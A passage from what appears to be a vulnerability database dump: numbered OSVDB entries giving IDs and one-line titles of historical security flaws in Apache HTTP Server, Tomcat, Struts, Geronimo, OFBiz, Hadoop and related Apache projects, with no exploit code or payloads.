7842| [80349] Apache HTTP Server mod_fcgid Module fcgid_spawn_ctl.c FcgidMaxProcessesPerClass Virtual Host Directive HTTP Request Parsing Remote DoS
7843| [80301] Apache Wicket /resources/ Absolute Path Arbitrary File Access
7844| [80300] Apache Wicket wicket:pageMapName Parameter XSS
7845| [79478] Apache Solr Extension for TYPO3 Unspecified XSS
7846| [79002] Apache MyFaces javax.faces.resource In Parameter Traversal Arbitrary File Access
7847| [78994] Apache Struts struts-examples/upload/upload-submit.do name Parameter XSS
7848| [78993] Apache Struts struts-cookbook/processDyna.do message Parameter XSS
7849| [78992] Apache Struts struts-cookbook/processSimple.do message Parameter XSS
7850| [78991] Apache Struts struts2-rest-showcase/orders clientName Parameter XSS
7851| [78990] Apache Struts struts2-showcase/person/editPerson.action Multiple Parameter XSS
7852| [78932] Apache APR Hash Collision Form Parameter Parsing Remote DoS
7853| [78903] Apache CXF SOAP Request Parsing WS-Security UsernameToken Policy Bypass
7854| [78600] Apache Tomcat HTTP DIGEST Authentication DigestAuthenticator.java Catalina Weakness Security Bypass
7855| [78599] Apache Tomcat HTTP DIGEST Authentication Realm Value Parsing Security Bypass
7856| [78598] Apache Tomcat HTTP DIGEST Authentication qop Value Parsing Security Bypass
7857| [78573] Apache Tomcat Parameter Saturation CPU Consumption Remote DoS
7858| [78556] Apache HTTP Server Status Code 400 Default Error Response httpOnly Cookie Disclosure
7859| [78555] Apache HTTP Server Threaded MPM %{cookiename}C Log Format String Cookie Handling Remote DoS
7860| [78501] Apache Struts ParameterInterceptor Class OGNL Expression Parsing Remote Command Execution
7861| [78331] Apache Tomcat Request Object Recycling Information Disclosure
7862| [78293] Apache HTTP Server Scoreboard Invalid Free Operation Local Security Bypass
7863| [78277] Apache Struts ExceptionDelegator Component Parameter Parsing Remote Code Execution
7864| [78276] Apache Struts DebuggingInterceptor Component Developer Mode Unspecified Remote Command Execution
7865| [78113] Apache Tomcat Hash Collision Form Parameter Parsing Remote DoS
7866| [78112] Apache Geronimo Hash Collision Form Parameter Parsing Remote DoS
7867| [78109] Apache Struts ParameterInterceptor Traversal Arbitrary File Overwrite
7868| [78108] Apache Struts CookieInterceptor Cookie Name Handling Remote Command Execution
7869| [77593] Apache Struts Conversion Error OGNL Expression Injection
7870| [77496] Apache ActiveMQ Failover Mechanism Openwire Request Parsing Remote DoS
7871| [77444] Apache HTTP Server mod_proxy Mdule Web Request HTTP/0.9 Protocol URL Parsing Proxy Remote Security Bypass
7872| [77374] Apache MyFaces Java Bean includeViewParameters Parsing EL Expression Security Weakness
7873| [77310] Apache HTTP Server mod_proxy Reverse Proxy Mode Security Bypass Weakness (2011-4317)
7874| [77234] Apache HTTP Server on cygwin Encoded Traversal Arbitrary File Access
7875| [77012] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Memory Consumption DoS
7876| [76944] Apache Tomcat Manager Application Servlets Access Restriction Bypass
7877| [76744] Apache HTTP Server server/utils.c ap_pregsub() Function htaccess File Handling Local Overflow
7878| [76189] Apache Tomcat HTTP DIGEST Authentication Weakness
7879| [76079] Apache HTTP Server mod_proxy Mdule Web Request URL Parsing Proxy Remote Security Bypass (2011-3368)
7880| [76072] Apache JServ jserv.conf jserv-status Handler jserv/ URI Request Parsing Local Information Disclosure
7881| [75807] Apache HTTP Server Incomplete Header Connection Saturation Remote DoS
7882| [75647] Apache HTTP Server mod_proxy_ajp Module mod_proxy_balancer HTTP Request Remote DoS
7883| [75376] Apache Libcloud SSL Certificate Validation MitM Server Spoofing Weakness
7884| [74853] Domain Technologie Control /etc/apache2/apache2.conf File Permissions Weakness dtcdaemons User Password Disclosure
7885| [74818] Apache Tomcat AJP Message Injection Authentication Bypass
7886| [74725] Apache Wicket Multi Window Support Unspecified XSS
7887| [74721] Apache HTTP Server ByteRange Filter Memory Exhaustion Remote DoS
7888| [74541] Apache Commons Daemon Jsvc Permissions Weakness Arbitrary File Access
7889| [74535] Apache Tomcat XML Parser Cross-application Multiple File Manipulation
7890| [74447] Apache Struts XWork Nonexistent Method s:submit Element Internal Java Class Remote Path Disclosure
7891| [74262] Apache HTTP Server Multi-Processing Module itk.c Configuration Merger mpm-itk root UID / GID Remote Privilege Escalation
7892| [74120] Apache HTTP Server mod_authnz_external mysql/mysql-auth.pl user Field SQL Injection
7893| [73920] Oracle Secure Backup /apache/htdocts/php/common.php username Parameter Remote Code Execution
7894| [73798] Apache Tomcat sendfile Request Start / Endpoint Parsing Local DoS
7895| [73797] Apache Tomcat sendfile Request Attribute Validation Weakness Local Access Restriction Bypass
7896| [73776] Apache Tomcat HTTP BIO Connector HTTP Pipelining Cross-user Remote Response Access
7897| [73644] Apache XML Security Signature Key Parsing Overflow DoS
7898| [73600] Apache Struts javatemplates Plugin Component Handlers .action URI Multiple Parameter XSS
7899| [73462] Apache Rampart/C util/rampart_timestamp_token.c rampart_timestamp_token_validate Function Expired Token Remote Access Restriction Bypass
7900| [73429] Apache Tomcat JMX MemoryUserDatabase Local Password Disclosure
7901| [73384] Apache HTTP Server mod_rewrite PCRE Resource Exhaustion DoS
7902| [73383] Apache HTTP Server Portable Runtime (APR) Library apr_fnmatch() Infinite Loop Remote DoS
7903| [73378] IBM WebSphere Application Server (WAS) JavaServer Pages org.apache.jasper.runtime.JspWriterImpl.response JSP Page Application Restart Remote DoS
7904| [73247] Apache Subversion mod_dav_svn File Permission Weakness Information Disclosure
7905| [73246] Apache Subversion mod_dav_svn Path-based Access Control Rule Handling Remote DoS
7906| [73245] Apache Subversion mod_dav_svn Baselined Resource Request Handling Remote DoS
7907| [73154] Apache Archiva Multiple Unspecified CSRF
7908| [73153] Apache Archiva /archiva/admin/deleteNetworkProxy!confirm.action proxyid Parameter XSS
7909| [72407] Apache Tomcat @ServletSecurity Initial Load Annotation Security Constraint Bypass Information Disclosure
7910| [72238] Apache Struts Action / Method Names <
7911| [71647] Apache HttpComponents HttpClient Proxy-Authorization Credentials Remote Disclosure
7912| [71558] Apache Tomcat SecurityManager ServletContext Attribute Traversal Arbitrary File Manipulation
7913| [71557] Apache Tomcat HTML Manager Multiple XSS
7914| [71075] Apache Archiva User Management Page XSS
7915| [71027] Apache Tomcat @ServletSecurity Annotation Security Constraint Bypass Information Disclosure
7916| [70925] Apache Continuum Project Pages Unspecified XSS (2011-0533)
7917| [70924] Apache Continuum Multiple Admin Function CSRF
7918| [70809] Apache Tomcat NIO HTTP Connector Request Line Processing DoS
7919| [70734] Apache CouchDB Request / Cookie Handling Unspecified XSS
7920| [70585] Oracle Fusion Middleware Oracle HTTP Server Apache Plugin Unspecified Remote Issue
7921| [70333] Apache Subversion rev_hunt.c blame Command Multiple Memory Leak Remote DoS
7922| [70332] Apache Subversion Apache HTTP Server mod_dav_svn repos.c walk FunctionSVNParentPath Collection Remote DoS
7923| [69659] Apache Archiva Admin Authentication Weakness Privilege Escalation
7924| [69520] Apache Archiva Administrator Credential Manipulation CSRF
7925| [69512] Apache Tomcat Set-Cookie Header HTTPOnly Flag Session Hijacking Weakness
7926| [69456] Apache Tomcat Manager manager/html/sessions Multiple Parameter XSS
7927| [69275] Apache mod_fcgid Module fcgid_bucket.c fcgid_header_bucket_read() Function Remote Overflow
7928| [69067] Apache Shiro URI Path Security Traversal Information Disclosure
7929| [68815] Apache MyFaces shared/util/StateUtils.java View State MAC Weakness Cryptographic Padding Remote View State Modification
7930| [68670] Apache Qpid C++ Broker Component broker/SessionAdapter.cpp SessionAdapter::ExchangeHandlerImpl::checkAlternate Function Exchange Alternate Remote DoS
7931| [68669] Apache Qpid cluster/Cluster.cpp Cluster::deliveredEvent Function Invalid AMQP Data Remote DoS
7932| [68662] Apache Axis2 dswsbobje.war Module Admin Account Default Password
7933| [68531] Apache Qpid qpidd sys/ssl/SslSocket.cpp Incomplete SSL Handshake Remote DoS
7934| [68327] Apache APR-util buckets/apr_brigade.c apr_brigade_split_line() Function Memory Consumption DoS
7935| [68314] Apache XML-RPC SAX Parser External Entity Information Disclosure
7936| [67964] Apache Traffic Server Transaction ID / Source Port Randomization Weakness DNS Cache Poisoning
7937| [67846] SUSE Lifecycle Management Server on SUSE Linux Enterprise apache2-slms Parameter Quoting CSRF
7938| [67294] Apache CXF XML SOAP Message Crafted Document Type Declaration Remote DoS
7939| [67240] Apache CouchDB Installation Page Direct Request Arbitrary JavaScript Code Execution CSRF
7940| [67205] Apache Derby BUILTIN Authentication Password Hash Generation Algorithm SHA-1 Transformation Password Substitution
7941| [66745] Apache HTTP Server Multiple Modules Pathless Request Remote DoS
7942| [66319] Apache Tomcat Crafted Transfer-Encoding Header Handling Buffer Recycling Remote DoS
7943| [66280] Apache Struts XWork ParameterInterceptor Server-Side Object Remote Code Execution
7944| [66226] Apache Axis2 Admin Interface Cookie Session Fixation
7945| [65697] Apache Axis2 / Java SOAP Message DTD Rejection Weakness Arbitrary File Access
7946| [65654] Apache HTTP Server mod_proxy_http mod_proxy_http.c Timeout Detection Weakness HTTP Request Response Disclosure
7947| [65429] Apache MyFaces Unencrypted ViewState Serialized View Object Manipulation Arbitrary Expression Language (EL) Statement Execution
7948| [65054] Apache ActiveMQ Jetty Error Handler XSS
7949| [64844] Apache Axis2/Java axis2/axis2-admin/engagingglobally modules Parameter XSS
7950| [64522] Apache Open For Business Project (OFBiz) ecommerce/control/contactus Multiple Parameter XSS
7951| [64521] Apache Open For Business Project (OFBiz) Web Tools Section entityName Parameter XSS
7952| [64520] Apache Open For Business Project (OFBiz) ecommerce/control/ViewBlogArticle contentId Parameter XSS
7953| [64519] Apache Open For Business Project (OFBiz) Control Servlet URI XSS
7954| [64518] Apache Open For Business Project (OFBiz) Show Portal Page Section start Parameter XSS
7955| [64517] Apache Open For Business Project (OFBiz) View Profile Section partyId Parameter XSS
7956| [64516] Apache Open For Business Project (OFBiz) Export Product Listing Section productStoreId Parameter XSS
7957| [64307] Apache Tomcat Web Application Manager/Host Manager CSRF
7958| [64056] mod_auth_shadow for Apache HTTP Server wait() Function Authentication Bypass
7959| [64023] Apache Tomcat WWW-Authenticate Header Local Host Information Disclosure
7960| [64020] Apache ActiveMQ Jetty ResourceHandler Crafted Request JSP File Source Disclosure
7961| [63895] Apache HTTP Server mod_headers Unspecified Issue
7962| [63368] Apache ActiveMQ createDestination.action JMSDestination Parameter CSRF
7963| [63367] Apache ActiveMQ createDestination.action JMSDestination Parameter XSS
7964| [63350] Apache CouchDB Hash Verification Algorithm Predictable Execution Time Weakness
7965| [63140] Apache Thrift Service Malformed Data Remote DoS
7966| [62676] Apache HTTP Server mod_proxy_ajp Module Crafted Request Remote DoS
7967| [62675] Apache HTTP Server Multi-Processing Module (MPM) Subrequest Header Handling Cross-thread Information Disclosure
7968| [62674] Apache HTTP Server mod_isapi Module Unloading Crafted Request Remote DoS
7969| [62231] Apache HTTP Server Logging Format Weakness Crafted DNS Response IP Address Spoofing
7970| [62230] Apache HTTP Server Crafted DNS Response Inverse Lookup Log Corruption XSS
7971| [62054] Apache Tomcat WAR Filename Traversal Work-directory File Deletion
7972| [62053] Apache Tomcat Autodeployment Process appBase File HTTP Request Authentication Bypass
7973| [62052] Apache Tomcat WAR File Traversal Arbitrary File Overwrite
7974| [62009] Apache HTTP Server src/modules/proxy/proxy_util.c mod_proxy ap_proxy_send_fb() Function Overflow
7975| [61379] Apache River Outrigger Entry Storage Saturation Memory Exhaustion DoS
7976| [61378] Apache Hadoop Map/Reduce JobTracker Memory Consumption DoS
7977| [61377] Apache Commons Modeler Multiple Mutable Static Fields Weakness
7978| [61376] Apache Rampart wsse:security Tag Signature Value Checking Weakness
7979| [60687] Apache C++ Standard Library (STDCXX) strxfrm() Function Overflow
7980| [60680] Apache Hadoop JobHistory Job Name Manipulation Weakness
7981| [60679] Apache ODE DeploymentWebService OMElement zipPart CRLF Injection
7982| [60678] Apache Roller Comment Email Notification Manipulation DoS
7983| [60677] Apache CouchDB Unspecified Document Handling Remote DoS
7984| [60428] Sun Java Plug-in org.apache.crimson.tree.XmlDocument Class reateXmlDocument Method Floppy Drive Access Bypass
7985| [60413] mod_throttle for Apache Shared Memory File Manipulation Local Privilege Escalation
7986| [60412] Sun Java Plug-in org.apache.xalan.processor.XSLProcessorVersion Class Unsigned Applet Variable Sharing Privilege Escalation
7987| [60396] Apache HTTP Server on OpenBSD Multipart MIME Boundary Remote Information Disclosure
7988| [60395] Apache HTTP Server on OpenBSD ETag HTTP Header Remote Information Disclosure
7989| [60232] PHP on Apache php.exe Direct Request Remote DoS
7990| [60176] Apache Tomcat Windows Installer Admin Default Password
7991| [60016] Apache HTTP Server on HP Secure OS for Linux HTTP Request Handling Unspecified Issue
7992| [59979] Apache HTTP Server on Apple Mac OS X HTTP TRACE Method Unspecified Client XSS
7993| [59969] Apache HTTP Server mod_ssl SSL / TLS Renegotiation Handshakes MiTM Plaintext Data Injection
7994| [59944] Apache Hadoop jobhistory.jsp XSS
7995| [59374] Apache Solr Search Extension for TYPO3 Unspecified XSS
7996| [59022] Apache Shindig ConcatProxyServlet HTTP Header Response Splitting
7997| [59021] Apache Cocoon X-Cocoon-Version Header Remote Information Disclosure
7998| [59020] Apache Tapestry HTTPS Session Cookie Secure Flag Weakness
7999| [59019] Apache mod_python Cookie Salting Weakness
8000| [59018] Apache Harmony Error Message Handling Overflow
8001| [59013] Apache Derby SYSCS_EXPORT_TABLE Arbitrary File Overwrite
8002| [59012] Apache Derby Driver Auto-loading Non-deterministic Startup Weakness
8003| [59011] Apache JSPWiki Page Attachment Change Note Function XSS
8004| [59010] Apache Solr get-file.jsp XSS
8005| [59009] Apache Solr action.jsp XSS
8006| [59008] Apache Solr analysis.jsp XSS
8007| [59007] Apache Solr schema.jsp Multiple Parameter XSS
8008| [59006] Apache Beehive select / checkbox Tag XSS
8009| [59005] Apache Beehive jpfScopeID Global Parameter XSS
8010| [59004] Apache Beehive Error Message XSS
8011| [59003] Apache HttpClient POST Request Handling Memory Consumption DoS
8012| [59002] Apache Jetspeed default-page.psml URI XSS
8013| [59001] Apache Axis2 xsd Parameter Traversal Arbitrary File Disclosure
8014| [59000] Apache CXF Unsigned Message Policy Bypass
8015| [58999] Apache WSS4J CallbackHandler Plaintext Password Validation Weakness
8016| [58998] Apache OpenJPA persistence.xml Cleartext Password Local Disclosure
8017| [58997] Apache OpenEJB openejb.xml Cleartext Password Local Disclosure
8018| [58996] Apache Hadoop Map/Reduce LinuxTaskController File Group Ownership Weakness
8019| [58995] Apache Hadoop Map/Reduce Task Ownership Weakness
8020| [58994] Apache Hadoop Map/Reduce DistributedCache Localized File Permission Weakness
8021| [58993] Apache Hadoop browseBlock.jsp XSS
8022| [58991] Apache Hadoop browseDirectory.jsp XSS
8023| [58990] Apache Hadoop Map/Reduce HTTP TaskTrackers User Data Remote Disclosure
8024| [58989] Apache Hadoop Sqoop Process Listing Local Cleartext Password Disclosure
8025| [58988] Apache Hadoop Chukwa HICC Portal Unspecified XSS
8026| [58987] Apache Hadoop Map/Reduce TaskTracker User File Permission Weakness
8027| [58986] Apache Qpid Encrypted Message Handling Remote Overflow DoS
8028| [58985] Apache Qpid Process Listing Local Cleartext Password Disclosure
8029| [58984] Apache Jackrabbit Content Repository (JCR) Default Account Privilege Access Weakness
8030| [58983] Apache Jackrabbit Content Repository (JCR) NamespaceRegistry API Registration Method Race Condition
8031| [58982] Apache Synapse Proxy Service Security Policy Mismatch Weakness
8032| [58981] Apache Geronimo TomcatGeronimoRealm Security Context Persistence Weakness
8033| [58980] Apache Geronimo LDAP Realm Configuration Restart Reversion Weakness
8034| [58979] Apache MyFaces Tomahawk ExtensionsPhaseListener HTML Injection Information Disclosure
8035| [58978] Apache MyFaces Trinidad LocaleInfoScriptlet XSS
8036| [58977] Apache Open For Business Project (OFBiz) Multiple Default Accounts
8037| [58976] Apache Open For Business Project (OFBiz) URI passThru Parameter XSS
8038| [58975] Apache Open For Business Project (OFBiz) PARTYMGR_CREATE/UPDATE Permission Arbitrary User Password Modification
8039| [58974] Apache Sling /apps Script User Session Management Access Weakness
8040| [58973] Apache Tuscany Crafted SOAP Request Access Restriction Bypass
8041| [58931] Apache Geronimo Cookie Parameters Validation Weakness
8042| [58930] Apache Xalan-C++ XPath Handling Remote DoS
8043| [58879] Apache Portable Runtime (APR-util) poll/unix/port.c Event Port Backend Pollset Feature Remote DoS
8044| [58837] Apache Commons Net FTPSClient CipherSuites / Protocols Mutable Object Unspecified Data Security Issue
8045| [58813] Apache MyFaces Trinidad tr:table / HTML Comment Handling DoS
8046| [58812] Apache Open For Business Project (OFBiz) JSESSIONID Session Hijacking Weakness
8047| [58811] Apache Open For Business Project (OFBiz) /catalog/control/EditProductConfigItem configItemId Parameter XSS
8048| [58810] Apache Open For Business Project (OFBiz) /catalog/control/EditProdCatalo prodCatalogId Parameter XSS
8049| [58809] Apache Open For Business Project (OFBiz) /partymgr/control/viewprofile partyId Parameter XSS
8050| [58808] Apache Open For Business Project (OFBiz) /catalog/control/createProduct internalName Parameter XSS
8051| [58807] Apache Open For Business Project (OFBiz) Multiple Unspecified CSRF
8052| [58806] Apache FtpServer MINA Logging Filter Cleartext Credential Local Disclosure
8053| [58805] Apache Derby Unauthenticated Database / Admin Access
8054| [58804] Apache Wicket Header Contribution Unspecified Issue
8055| [58803] Apache Wicket Session Fixation
8056| [58802] Apache Directory Server (ApacheDS) userPassword Attribute Search Password Disclosure
8057| [58801] Apache ActiveMQ Stomp Client Credential Validation Bypass
8058| [58800] Apache Tapestry (context)/servicestatus Internal Service Information Disclosure
8059| [58799] Apache Tapestry Logging Cleartext Password Disclosure
8060| [58798] Apache Jetspeed pipeline Parameter pipeline-map Policy Bypass
8061| [58797] Apache Jetspeed Password Policy Multiple Weaknesses
8062| [58796] Apache Jetspeed Unsalted Password Storage Weakness
8063| [58795] Apache Rampart Crafted SOAP Header Authentication Bypass
8064| [58794] Apache Roller Admin Protocol (RAP) Malformed Header Authentication Bypass
8065| [58793] Apache Hadoop Map/Reduce mapred.system.dir Permission Weakness Job Manipulation
8066| [58792] Apache Shindig gadgets.rpc iframe RPC Call Validation Weakness
8067| [58791] Apache Synapse synapse.properties Cleartext Credential Local Disclosure
8068| [58790] Apache WSS4J SOAP Message UsernameToken Remote Password Disclosure
8069| [58789] Apache WSS4J SOAP Header Malformed UsernameToken Authentication Bypass
8070| [58776] Apache JSPWiki PreviewContent.jsp Edited Text XSS
8071| [58775] Apache JSPWiki preview.jsp action Parameter XSS
8072| [58774] Apache JSPWiki Edit.jsp Multiple Parameter XSS
8073| [58773] Apache JSPWiki Accept-Language Header Multiple Script language Parameter XSS
8074| [58772] Apache JSPWiki EditorManager.java editor Parameter XSS
8075| [58771] Apache JSPWiki GroupContent.jsp Multiple Parameter XSS
8076| [58770] Apache JSPWiki Group.jsp group Parameter XSS
8077| [58769] Apache JSPWiki Database Connection Termination DoS Weakness
8078| [58768] Apache JSPWiki Attachment Servlet nextpage Parameter Arbitrary Site Redirect
8079| [58766] Apache JSPWiki /admin/SecurityConfig.jsp Direct Request Information Disclosure
8080| [58765] Apache JSPWiki Spam Filter UniqueID RNG Weakness
8081| [58764] Apache JSPWiki Edit.jsp Multiple Parameter XSS
8082| [58763] Apache JSPWiki Include Tag Multiple Script XSS
8083| [58762] Apache JSPWiki Multiple .java Tags pageContext Parameter XSS
8084| [58761] Apache JSPWiki Wiki.jsp skin Parameter XSS
8085| [58760] Apache Commons VFS Exception Error Message Cleartext Credential Disclosure
8086| [58759] Apache Jackrabbit Content Repository (JCR) UUID System.currentTimeMillis() RNG Weakness
8087| [58758] Apache River GrantPermission Policy Manipulation Privilege Escalation
8088| [58757] Apache WS-Commons Java2 StaXUtils Multiple Unspecified Minor Issues
8089| [58756] Apache WSS4J WSHandler Client Certificate Signature Validation Weakness
8090| [58755] Apache Harmony DRLVM Non-public Class Member Access
8091| [58754] Apache Harmony File.createTempFile() Temporary File Creation Prediction Weakness
8092| [58751] Apache Geronimo GeronimoIdentityResolver Subject Handling Multiple Issues
8093| [58750] Apache MyFaces Trinidad Generated HTML Information Disclosure
8094| [58749] Apache MyFaces Trinidad Database Access Error Message Information Disclosure
8095| [58748] Apache MyFaces Trinidad Image Resource Loader Traversal Arbitrary Image Access
8096| [58747] Apache MyFaces Trinidad Error Message User Entered Data Disclosure Weakness
8097| [58746] Apache Axis2 JAX-WS Java2 WSDL4J Unspecified Issue
8098| [58744] Apache Wicket Crafted File Upload Disk Space Exhaustion DoS
8099| [58743] Apache Wicket wicket.util.crypt.SunJceCrypt Encryption Reversion Weakness
8100| [58742] Apache Rampart PolicyBasedValiadtor HttpsToken Endpoint Connection Weakness
8101| [58741] Apache Rampart WSSecSignature / WSSecEncryptedKey KeyIdentifierType Validation Weakness
8102| [58740] Apache Rampart TransportBinding Message Payload Cleartext Disclosure
8103| [58739] Apache Open For Business Project (OFBiz) Unsalted Password Storage Weakness
8104| [58738] Apache Open For Business Project (OFBiz) orderId Parameter Arbitrary Order Access
8105| [58737] Apache mod_python w/ mod_python.publisher index.py Underscore Prefixed Variable Disclosure
8106| [58735] Apache Open For Business Project (OFBiz) /ecommerce/control/keywordsearch SEARCH_STRING Parameter XSS
8107| [58734] Apache Torque Log File Cleartext Credential Local Disclosure
8108| [58733] Apache Axis2 doGet Implementation Authentication Bypass Service State Manipulation
8109| [58732] Apache MyFaces UIInput.validate() Null Value Validation Bypass Weakness
8110| [58731] Apache MyFaces /faces/* Prefix Mapping Authentication Bypass
8111| [58725] Apache Tapestry Basic String ACL Bypass Weakness
8112| [58724] Apache Roller Logout Functionality Failure Session Persistence
8113| [58723] Apache Roller User Profile / Admin Page Cleartext Password Disclosure
8114| [58722] Apache Derby Connection URL Encryption Method Reversion Weakness
8115| [58721] Apache Geronimo on Tomcat Security-constraint Resource ACL Bypass
8116| [58720] Apache Geronimo Explicit Servlet Mapping Access Bypass Weakness
8117| [58719] Apache Geronimo Keystore Unprivileged Service Disable DoS
8118| [58718] Apache Geronimo Deployment Plans Remote Password Disclosure
8119| [58717] Apache Jetspeed Portlet Application Edit Access Restriction Bypass
8120| [58716] Apache Jetspeed PSML Management Cached Constraint Authentication Weakness
8121| [58707] Apache WSS4J Crafted PasswordDigest Request Authentication Bypass
8122| [58706] Apache HttpClient Pre-emptive Authorization Remote Credential Disclosure
8123| [58705] Apache Directory Server (ApacheDS) User Passwords Cleartext Disclosure
8124| [58704] Apache Directory Server (ApacheDS) Non-existent User LDAP Bind Remote DoS
8125| [58703] Apache Geronimo Debug Console Unauthenticated Remote Information Disclosure
8126| [58702] Apache Directory Server (ApacheDS) Persistent LDAP Anonymous Bind Weakness
8127| [58701] Apache Jetspeed User Admin Portlet Unpassworded Account Creation Weakness
8128| [58700] Apache MyFaces /faces/* Path Handling Remote Overflow DoS
8129| [58699] Apache MyFaces Disable Property Client Side Manipulation Privilege Escalation
8130| [58698] Apache Roller Remember Me Functionality Cleartext Password Disclosure
8131| [58697] Apache XalanJ2 org.apache.xalan.xsltc.runtime.CallFunction Class Unspecified Issue
8132| [58696] Apache Tapestry Encoded Traversal Arbitrary File Access
8133| [58695] Apache Jetspeed Unauthenticated PSML Tags / Admin Folder Access
8134| [58694] Apache Geronimo Deploy Tool Process List Local Credential Disclosure
8135| [58693] Apache Derby service.properties File Encryption Key Information Disclosure
8136| [58692] Apache Geronimo Default Security Realm Login Brute Force Weakness
8137| [58689] Apache Roller Retrieve Last 5 Post Feature Unauthorized Blog Post Manipulation
8138| [58688] Apache Xalan-Java (XalanJ2) Static Variables Multiple Unspecified Issues
8139| [58687] Apache Axis Invalid wsdl Request XSS
8140| [58686] Apache Cocoon Temporary File Creation Unspecified Race Condition
8141| [58685] Apache Velocity Template Designer Privileged Code Execution
8142| [58684] Apache Jetspeed controls.Customize Action Security Check Bypass
8143| [58675] Apache Open For Business Project (OFBiz) eCommerce/ordermgr Multiple Field XSS
8144| [58674] Apache Open For Business Project (OFBiz) ecommerce/control/login Multiple Field XSS
8145| [58673] Apache Open For Business Project (OFBiz) ecommerce/control/viewprofile Multiple Field XSS
8146| [58672] Apache Open For Business Project (OFBiz) POS Input Panel Cleartext Password Disclosure
8147| [58671] Apache Axis2 JMS Signed Message Crafted WS-Security Header Security Bypass
8148| [58670] Apache Jetspeed JetspeedTool.getPortletFromRegistry Portlet Security Validation Failure
8149| [58669] Apache Jetspeed LDAP Cleartext Passwords Disclosure
8150| [58668] Apache Axis External Entity (XXE) Data Parsing Privilege Escalation
8151| [58667] Apache Roller Database Cleartext Passwords Disclosure
8152| [58666] Apache Xerces-C++ UTF-8 Transcoder Overlong Code Handling Unspecified Issue
8153| [58665] Apache Jetspeed Turbine: Cross-user Privileged Action Execution
8154| [58664] Apache Jetspeed EditAccount.vm Password Modification Weakness
8155| [58663] Apache Jetspeed Role Parameter Arbitrary Portlet Disclosure
8156| [58662] Apache Axis JWS Page Generated .class File Direct Request Information Disclosure
8157| [58661] Apache Jetspeed user-form.vm Password Reset Cleartext Disclosure
8158| [58660] Apache WSS4J checkReceiverResults Function Crafted SOAP Request Authentication Bypass
8159| [58658] Apache Rampart Crafted SOAP Request Security Verification Bypass
8160| [57882] Apache HTTP Server mod_proxy_ftp Authorization HTTP Header Arbitrary FTP Command Injection
8161| [57851] Apache HTTP Server mod_proxy_ftp EPSV Command NULL Dereference Remote DoS
8162| [56984] Apache Xerces2 Java Malformed XML Input DoS
8163| [56903] Apache ODE (Orchestration Director Engine) Process Deployment Web Service Traversal Arbitrary File Manipulation
8164| [56859] Apache Xerces-C++ Multiple Sub-project XML Nested DTD Structures Parsing Recursion Error DoS
8165| [56766] Apache Portable Runtime (APR-util) memory/unix/apr_pools.c Relocatable Memory Block Aligning Overflow
8166| [56765] Apache Portable Runtime (APR-util) misc/apr_rmm.c Multiple Function Overflows
8167| [56517] Apache HTTP Server File Descriptor Leak Arbitrary Local File Append
8168| [56443] PTK Unspecified Apache Sub-process Arbitrary Command Execution
8169| [56414] Apache Tiles Duplicate Expression Language (EL) Expression Evaluation XSS
8170| [55814] mod_NTLM for Apache HTTP Server ap_log_rerror() Function Remote Format String
8171| [55813] mod_NTLM for Apache HTTP Server log() Function Remote Overflow
8172| [55782] Apache HTTP Server mod_deflate Module Aborted Connection DoS
8173| [55553] Apache HTTP Server mod_proxy Module mod_proxy_http.c stream_reqbody_cl Function CPU Consumption DoS
8174| [55059] Apache APR-util strmatch/apr_strmatch.c apr_strmatch_precompile Function Crafted Input Remote DoS
8175| [55058] Apache APR-util apr_brigade_vprintf Function Crafted Input Off-by-one Remote DoS
8176| [55057] Apache APR-util xml/apr_xml.c apr_xml_* Interface Expat XML Parser Crafted XML Document Remote DoS
8177| [55056] Apache Tomcat Cross-application TLD File Manipulation
8178| [55055] Apache Tomcat Illegal URL Encoded Password Request Username Enumeration
8179| [55054] Apache Tomcat Java AJP Connector mod_jk Load Balancing Worker Malformed Header Remote DoS
8180| [55053] Apache Tomcat Crafted Request Security Restraint Bypass Arbitrary Content Access
8181| [54733] Apache HTTP Server AllowOverride Directive .htaccess Options Bypass
8182| [54713] razorCMS Security Manager apache User Account Unspecified File Permission Weakness Issue
8183| [54589] Apache Jserv Nonexistent JSP Request XSS
8184| [54122] Apache Struts s:a / s:url Tag href Element XSS
8185| [54093] Apache ActiveMQ Web Console JMS Message XSS
8186| [53932] Apache Geronimo Multiple Admin Function CSRF
8187| [53931] Apache Geronimo /console/portal/Server/Monitoring Multiple Parameter XSS
8188| [53930] Apache Geronimo /console/portal/ URI XSS
8189| [53929] Apache Geronimo on Windows Security/Keystores Portlet Traversal Arbitrary File Upload
8190| [53928] Apache Geronimo on Windows Embedded DB/DB Manager Portlet Traversal Arbitrary File Upload
8191| [53927] Apache Geronimo on Windows Services/Repository Portlet Traversal Arbitrary File Upload
8192| [53921] Apache HTTP Server mod_proxy_ajp Cross Thread/Session Information Disclosure
8193| [53766] Oracle BEA WebLogic Server Plug-ins for Apache Certificate Handling Remote Overflow
8194| [53574] PHP on Apache .htaccess mbstring.func_overload Setting Cross Hosted Site Behavior Modification
8195| [53381] Apache Tomcat JK Connector Content-Length Header Cross-user Information Disclosure
8196| [53380] Apache Struts Unspecified XSS
8197| [53289] Apache mod_perl Apache::Status /perl-status Unspecified XSS
8198| [53186] Apache HTTP Server htpasswd Predictable Salt Weakness
8199| [52899] Apache Tomcat Examples Web Application Calendar Application jsp/cal/cal2.jsp time Parameter XSS
8200| [52407] Apache Tomcat doRead Method POST Content Information Disclosure
8201| [51923] Apache HTTP Server mod-auth-mysql Module mod_auth_mysql.c Multibyte Character Encoding SQL Injection
8202| [51613] Apache HTTP Server Third-party Module Child Process File Descriptor Leak
8203| [51612] Apache HTTP Server Internal Redirect Handling Infinite Loop DoS
8204| [51468] Apache Jackrabbit Content Repository (JCR) swr.jsp q Parameter XSS
8205| [51467] Apache Jackrabbit Content Repository (JCR) search.jsp q Parameter XSS
8206| [51151] Apache Roller Search Function q Parameter XSS
8207| [50482] PHP with Apache php_value Order Unspecified Issue
8208| [50475] Novell NetWare ApacheAdmin Console Unauthenticated Access
8209| [49734] Apache Struts DefaultStaticContentLoader Class Traversal Arbitrary File Access
8210| [49733] Apache Struts FilterDispatcher Class Traversal Arbitrary File Access
8211| [49283] Oracle BEA WebLogic Server Plugins for Apache Remote Transfer-Encoding Overflow
8212| [49062] Apache Tomcat Cross-thread Concurrent Request Variable Overwrite Information Disclosure
8213| [48847] ModSecurity (mod_security) Transformation Caching Unspecified Apache DoS
8214| [48788] Apache Xerces-C++ XML Schema maxOccurs Value XML File Handling DoS
8215| [47474] Apache HTTP Server mod_proxy_ftp Directory Component Wildcard Character XSS
8216| [47464] Apache Tomcat allowLinking / UTF-8 Traversal Arbitrary File Access
8217| [47463] Apache Tomcat RequestDispatcher Traversal Arbitrary File Access
